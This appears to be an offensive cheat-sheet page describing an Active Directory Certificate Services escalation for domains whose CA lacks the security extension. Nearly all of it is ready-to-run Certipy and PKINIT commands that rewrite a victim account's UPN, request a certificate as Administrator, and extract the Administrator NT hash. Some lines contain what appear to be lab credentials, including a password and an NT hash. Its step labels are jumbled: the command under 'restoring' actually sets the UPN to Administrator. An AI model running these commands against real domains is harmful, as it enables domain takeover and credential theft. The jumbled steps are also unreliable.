PRIMARY CATEGORY β ADCS
Theory
π οΈβ
This attack leverages the absence of the security extension on the CA
Enumeration
Certipy
certipy find -dc-ip '<DC_IP>' -username '<USER>' -password '<PASSWD>' -stdout -vulnerableAbuse - UNIX-Like
In order to accomplish this task, an operator must have control over a domain account which has GenericWrite, GenericAll, WriteDACL or WriteProperty (UPN atrribute) on another domain account
Workflow
π οΈβ
Requirements
π οΈβ
Abuse
Checking UPN for the vulnerable user
certipy account -dc-ip '<DC>' -username '<CONTROLLED_ACCOUNT>' -password '<PASSWD>' -user '<VULNERABLE_USER>' readUpdating Vulnerable Userβs UPN
- Certipy
certipy account -dc-ip '<DC>' -username '<USER>' -password '<PASSWD>' -user '<VULNERABLE_USER>' -upn '<UPN>' updateRequesting the Certificate to the CA
- Certipy
certipy req -dc-ip 10.129.232.88 -username 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -ca 'fluffy-DC01-CA' -template 'User'Restoring the Original Value of the UPN Attribute
- Certipy
certipy account -dc-ip 10.129.232.88 -username 'p.agila' -password 'prometheusx-303' -user 'ca_svc' -upn 'Administrator' updatePassing-the-certificate + Unpac-the-hash as the Domain Administrator User
- Certipy
certipy auth -dc-ip 10.129.232.88 -user 'Administrator' -domain 'fluffy.htb' -pfx administrator.pfxpython3 gettgtpkinit.py -dc-ip '<DC>' -cert-pfx '<PFX_CERT>' '<DOMAIN>/Administrator' 'Administrator.ccache'export KRB5CCNAME=$( realpath '<CCACHE_FILE>' )python3 getnthash.py -dc-ip '<DC>' -key '<AS_KEY>' '<DOMAIN>/Administrator'